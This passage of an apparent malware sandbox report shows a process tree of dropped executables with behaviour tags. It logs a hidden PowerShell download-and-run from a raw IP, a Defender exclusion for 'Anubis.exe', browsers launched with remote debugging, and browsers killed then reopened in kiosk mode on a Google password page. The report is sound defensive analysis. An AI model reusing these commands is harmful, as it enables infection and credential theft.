        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5272,i,11199519152205436365,2553684636889237730,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4472 /prefetch:8
        8⤵
        
        PID:5536
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4720,i,11199519152205436365,2553684636889237730,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4964 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:5740
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:6112
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe469c46f8,0x7ffe469c4708,0x7ffe469c4718
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5924
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,11297243342714165285,1982087147856787761,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2028 /prefetch:2
        8⤵
        
        PID:2356
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1984,11297243342714165285,1982087147856787761,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2520 /prefetch:3
        8⤵
        
        PID:4632
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1984,11297243342714165285,1982087147856787761,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:8
        8⤵
        
        PID:5452
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1984,11297243342714165285,1982087147856787761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5324
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1984,11297243342714165285,1982087147856787761,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5496
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1984,11297243342714165285,1982087147856787761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5536
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1984,11297243342714165285,1982087147856787761,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4492 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5980
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\r9zuk" & exit
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5000
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        8⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:3616
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4320 -s 788
        6⤵
        Program crash
        
        PID:4172
    - - C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1464
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\cL3YjvDX\Anubis.exe""
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2220
    - - C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:624
      - C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"
        6⤵
        Executes dropped EXE
        
        PID:4540
      - C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"
        6⤵
        Executes dropped EXE
        
        PID:3868
      - C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"
        6⤵
        Executes dropped EXE
        
        PID:2252
      - C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2488
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 624 -s 732
        6⤵
        Program crash
        
        PID:3788
    - - C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3468
    - - C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4432
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\11AA.tmp\11AB.tmp\11AC.bat C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe"
        6⤵
        
        PID:4456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Suspicious use of AdjustPrivilegeToken
        
        PID:5304
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0p3zbteu\0p3zbteu.cmdline"
        9⤵
        
        PID:5736
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES51EF.tmp" "c:\Users\Admin\AppData\Local\Temp\0p3zbteu\CSCFF202BA93C164ED2B5142B5D8A21987A.TMP"
        10⤵
        
        PID:5788
    - - C:\Users\Admin\AppData\Local\Temp\10109250101\zY9sqWs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109250101\zY9sqWs.exe"
        5⤵
        Drops startup file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3952
    - - C:\Users\Admin\AppData\Local\Temp\10109260101\4d1551b4cb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109260101\4d1551b4cb.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5548
    - - C:\Users\Admin\AppData\Local\Temp\10109270101\4b25e374a7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109270101\4b25e374a7.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:3412
      - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        6⤵
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        
        PID:5520
    - - C:\Users\Admin\AppData\Local\Temp\10109280101\d77ee32371.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109280101\d77ee32371.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5236
      - C:\Users\Admin\AppData\Local\Temp\10109280101\d77ee32371.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109280101\d77ee32371.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5796
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5236 -s 804
        6⤵
        Program crash
        
        PID:5476
    - - C:\Users\Admin\AppData\Local\Temp\10109290101\c838ad95a8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109290101\c838ad95a8.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:5624
      - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3600
    - - C:\Users\Admin\AppData\Local\Temp\10109300101\698bfc576e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109300101\698bfc576e.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5832
    - - C:\Users\Admin\AppData\Local\Temp\10109310101\551d2e41be.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109310101\551d2e41be.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:2124
      - C:\Users\Admin\AppData\Local\Temp\ZEDHTUROOZA3TPCV95R8JRJG4J.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ZEDHTUROOZA3TPCV95R8JRJG4J.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5496
    - - C:\Users\Admin\AppData\Local\Temp\10109320101\4c1995acbe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109320101\4c1995acbe.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:5488
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        
        PID:2780
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe4705cc40,0x7ffe4705cc4c,0x7ffe4705cc58
        7⤵
        
        PID:2956
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2232,i,11728343758012737769,16393185512258576824,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2228 /prefetch:2
        7⤵
        
        PID:2068
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1768,i,11728343758012737769,16393185512258576824,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2272 /prefetch:3
        7⤵
        
        PID:1660
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1832,i,11728343758012737769,16393185512258576824,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2408 /prefetch:8
        7⤵
        
        PID:4632
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,11728343758012737769,16393185512258576824,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3204 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5316
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3328,i,11728343758012737769,16393185512258576824,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3336 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5972
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,11728343758012737769,16393185512258576824,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4276 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5680
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4628,i,11728343758012737769,16393185512258576824,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4648 /prefetch:8
        7⤵
        
        PID:5628
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4636,i,11728343758012737769,16393185512258576824,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4792 /prefetch:8
        7⤵
        
        PID:4692
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4852,i,11728343758012737769,16393185512258576824,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4652 /prefetch:8
        7⤵
        
        PID:3676
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4904,i,11728343758012737769,16393185512258576824,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4272 /prefetch:8
        7⤵
        
        PID:3608
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4884,i,11728343758012737769,16393185512258576824,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4680 /prefetch:8
        7⤵
        
        PID:4836
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5152,i,11728343758012737769,16393185512258576824,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5164 /prefetch:8
        7⤵
        
        PID:6008
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5156,i,11728343758012737769,16393185512258576824,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5320 /prefetch:8
        7⤵
        
        PID:2912
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5308,i,11728343758012737769,16393185512258576824,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4996 /prefetch:8
        7⤵
        
        PID:2636
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        
        PID:5128
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe457b46f8,0x7ffe457b4708,0x7ffe457b4718
        7⤵
        
        PID:2216
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,9705637299202978487,11871261358865060742,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
        7⤵
        
        PID:2068
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,9705637299202978487,11871261358865060742,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 /prefetch:3
        7⤵
        
        PID:5800
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,9705637299202978487,11871261358865060742,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
        7⤵
        
        PID:664
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2108,9705637299202978487,11871261358865060742,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:1468
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,9705637299202978487,11871261358865060742,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3400 /prefetch:2
        7⤵
        
        PID:5136
    - - C:\Users\Admin\AppData\Local\Temp\10109330101\0d5f7a13b2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109330101\0d5f7a13b2.exe"
        5⤵
        
        PID:5624
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        6⤵
        Kills process with taskkill
        
        PID:5344
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        6⤵
        Kills process with taskkill
        
        PID:3616
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        6⤵
        Kills process with taskkill
        
        PID:4236
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        6⤵
        Kills process with taskkill
        
        PID:5376
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        6⤵
        Kills process with taskkill
        
        PID:5128
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        6⤵
        
        PID:836
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:6124
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2024 -parentBuildID 20240401114208 -prefsHandle 1940 -prefMapHandle 1932 -prefsLen 27430 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {df0e707d-9b90-4c1a-9fe7-6520fc666260} 6124 "\\.\pipe\gecko-crash-server-pipe.6124" gpu
        8⤵
        
        PID:1648
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2432 -prefsLen 28350 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40c9e280-b30d-42e8-84df-50f1238e0b93} 6124 "\\.\pipe\gecko-crash-server-pipe.6124" socket
        8⤵
        
        PID:5980
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
